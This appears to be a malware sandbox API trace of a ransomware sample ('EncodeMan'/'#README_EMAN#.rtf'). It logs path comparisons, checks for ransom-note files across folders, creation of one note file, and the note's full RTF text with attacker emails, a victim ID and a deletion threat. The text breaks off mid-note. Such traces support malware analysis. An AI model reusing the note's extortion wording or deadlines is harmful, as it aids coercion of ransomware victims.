lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\", cchCount2=49) returned 3 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\", cchCount2=130) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\", cchCount2=130) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\", cchCount2=133) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", cchCount2=69) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", cchCount2=69) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", cchCount2=69) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", cchCount2=69) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", cchCount2=69) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\", cchCount2=134) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 3 [0276.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 3 [0276.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\#readme_eman#.rtf")) returned 0x20 [0276.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0x20 [0276.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0276.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\features\\#readme_eman#.rtf")) returned 0x20 [0276.434] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0x20 [0276.435] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\#readme_eman#.rtf")) returned 0x20 [0276.435] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\#readme_eman#.rtf")) returned 0x20 [0276.435] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\usoshared\\logs\\#readme_eman#.rtf")) returned 0x20 [0276.437] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\#readme_eman#.rtf")) returned 0x20 [0276.437] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\#readme_eman#.rtf")) returned 0x20 [0276.437] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\#readme_eman#.rtf")) returned 0xffffffff [0276.437] GetLastError () returned 0x2 [0276.437] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 